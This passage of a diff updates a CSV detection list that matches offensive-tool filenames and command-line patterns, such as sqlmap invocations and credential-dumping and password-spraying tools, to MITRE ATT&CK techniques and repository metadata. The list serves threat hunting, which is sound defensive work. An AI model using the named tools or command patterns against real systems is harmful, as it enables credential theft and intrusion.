and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*SpoolSploit/*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" @@ -17195,7 +17378,7 @@ "*SpoolTrigger.x86.dl*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*SpoolTrigger.x86.dll*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*SpoolTrigger\SpoolTrigger.*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" -"*spray* --recon *.* -u *.txt --threads 10*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*spray* --recon *.* -u *.txt --threads 10*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" "*Spray365.git*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "*spray365.py*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "*spray365_results_*.json*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","1","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" @@ -17212,84 +17395,84 @@ "*SprayingToolkit-master*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*SprayingToolkit-master.zip*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*spraykatz*","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","1","N/A","N/A","8","737","126","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z" -"*spring_framework_malicious_jar*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*spring_framework_malicious_jar*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*Spring-cloud-function-SpEL-RCE*","offensive_tool_keyword","POC","RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL)","T1059 - T1210 - T1507","TA0002 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE","1","1","N/A","N/A","","N/A","","","" "*spring-core-rce*ROOT.war*","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","1","N/A","N/A","1","54","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z" "*springFramework_CVE-2022-22965_RCE.py*","offensive_tool_keyword","POC","SpringFramework CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE","1","0","N/A","N/A","1","76","17","2022-04-01T12:08:45Z","2022-04-01T04:51:44Z" "*spyonweb-get-rootdomains *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*sql_persister.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*SqlClrPayload*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*sqldumper.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*sqli_common_shared.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Sqli-lab*","offensive_tool_keyword","sqli-labs","SQLI-LABS is a platform to learn SQLI Following labs are covered for GET and POST scenarios:","T1190 - T1553","TA0002 - TA0008","N/A","N/A","Web Attacks","https://github.com/Audi-1/sqli-labs","1","1","N/A","N/A","10","4688","1476","2020-06-04T19:51:55Z","2012-05-19T19:41:26Z" +"*sql_persister.py*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*SqlClrPayload*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*sqldumper.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*sqli_common_shared.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Sqli-lab*","offensive_tool_keyword","sqli-labs","SQLI-LABS is a platform to learn SQLI Following labs are covered for GET and POST scenarios:","T1190 - T1553","TA0002 - TA0008","N/A","N/A","Web Attacks","https://github.com/Audi-1/sqli-labs","1","1","N/A","N/A","10","4688","1475","2020-06-04T19:51:55Z","2012-05-19T19:41:26Z" "*SQL-Injection-Auth-Bypass-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" -"*SQL-Injection-Libraries*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*SQL-Injection-Libraries*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*SQL-Injection-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" "*SQLiPy.py*","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/sqlipy","1","1","N/A","N/A","3","247","102","2023-05-08T18:50:41Z","2014-09-22T03:25:42Z" "*SQLiScanner*","offensive_tool_keyword","SQLiScanner","Automatic SQL injection with Charles and sqlmapapi","T1190 - T1556 - T1210 - T1573","TA0002 - TA0003 - TA0008","N/A","N/A","Web Attacks","https://github.com/0xbug/SQLiScanner","1","1","N/A","N/A","8","760","298","2018-05-01T09:59:47Z","2016-08-28T06:06:32Z" -"*sqlite:///ares.db*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","523","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" -"*sqlmap -*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*sqlite:///ares.db*","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1439","524","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" +"*sqlmap -*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "*sqlmap --forms --batch -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*sqlmap.conf*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"*sqlmap.py*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"*sqlmap.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*sqlmap.conf*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*sqlmap.py*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*sqlmap.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*sqlmap/data/txt/wordlist.txt*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*sqlmap4burp*.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" -"*sqlmapapi -*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"*sqlmapapi.py","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*sqlmapapi -*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*sqlmapapi.py","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "*sqlmapapi.py*","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/sqlipy","1","1","N/A","N/A","3","247","102","2023-05-08T18:50:41Z","2014-09-22T03:25:42Z" -"*sqlmapproject/sqlmap*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"*SQLmate*","offensive_tool_keyword","SQLmate","A friend of SQLmap which will do what you always expected from SQLmap.","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Web Attacks","https://github.com/s0md3v/sqlmate","1","1","N/A","N/A","4","392","119","2019-05-05T15:53:06Z","2017-10-19T19:55:58Z" +"*sqlmapproject/sqlmap*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*SQLmate*","offensive_tool_keyword","SQLmate","A friend of SQLmap which will do what you always expected from SQLmap.","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Web Attacks","https://github.com/s0md3v/sqlmate","1","1","N/A","N/A","4","393","119","2019-05-05T15:53:06Z","2017-10-19T19:55:58Z" "*sqlninja*","offensive_tool_keyword","sqlninja","...a SQL Server injection & takeover tool","T1505 - T1526 - T1583 - T1588 - T1590","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Web Attacks","http://sqlninja.sourceforge.net/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*SQLRecon.exe*","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","1","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" "*SQLRecon.git*","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","1","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" -"*SQLServer_Accessible_PotentialSensitiveData.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*SQLServer_DefaultLogin.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*src/cracker.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*src/genmkvpwd.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 